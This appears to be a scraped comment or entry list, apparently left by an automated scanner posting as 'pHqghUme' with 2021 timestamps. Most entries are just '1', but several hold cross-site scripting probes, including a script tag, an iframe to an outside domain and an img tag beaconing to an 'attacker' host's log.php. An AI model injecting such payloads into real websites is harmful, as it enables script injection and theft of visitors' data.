 • pHqghUme

  2021-05-06 07:29:22


  1


 • pHqghUme

  2021-05-06 07:29:21


  1


 • pHqghUme

  2021-05-06 07:29:21


  1


 • pHqghUme

  2021-05-06 07:29:19


  1


 • pHqghUme

  2021-05-06 07:29:19


  1


 • pHqghUme

  2021-05-06 07:25:06


  1


 • pHqghUme

  2021-05-06 07:24:44


  1


 • pHqghUme

  2021-05-06 07:20:47


  1


 • pHqghUme

  2021-05-06 07:20:31


  1


 • pHqghUme

  2021-05-06 07:20:23


  1yoX6fvQO


 • 1gDeK0PaO

  2021-05-06 07:20:22


  1


 • pHqghUme

  2021-05-06 07:20:21


  1


 • pHqghUme

  2021-05-06 07:20:20


  1


 • pHqghUme

  2021-05-06 07:20:15


  1


 • pHqghUme

  2021-05-06 02:49:47


  1<KleQ4u<


 • pHqghUme

  2021-05-06 02:49:30


  1<img sRc='http://attacker-9968/log.php?


 • pHqghUme

  2021-05-06 02:49:14


  1<OHIGDX x=9517>


 • pHqghUme

  2021-05-06 02:49:00


  1<ifRAme sRc=9859.com></IfRamE>


 • pHqghUme

  2021-05-06 02:48:46


  1<WFUXAZ>00HII[!+!]</WFUXAZ>


 • pHqghUme

  2021-05-06 02:48:30


  1Rairb <ScRiPt >Kc4l(9393)</ScRiPt>


 • pHqghUme<1A25oc<

  2021-05-06 02:48:21


  1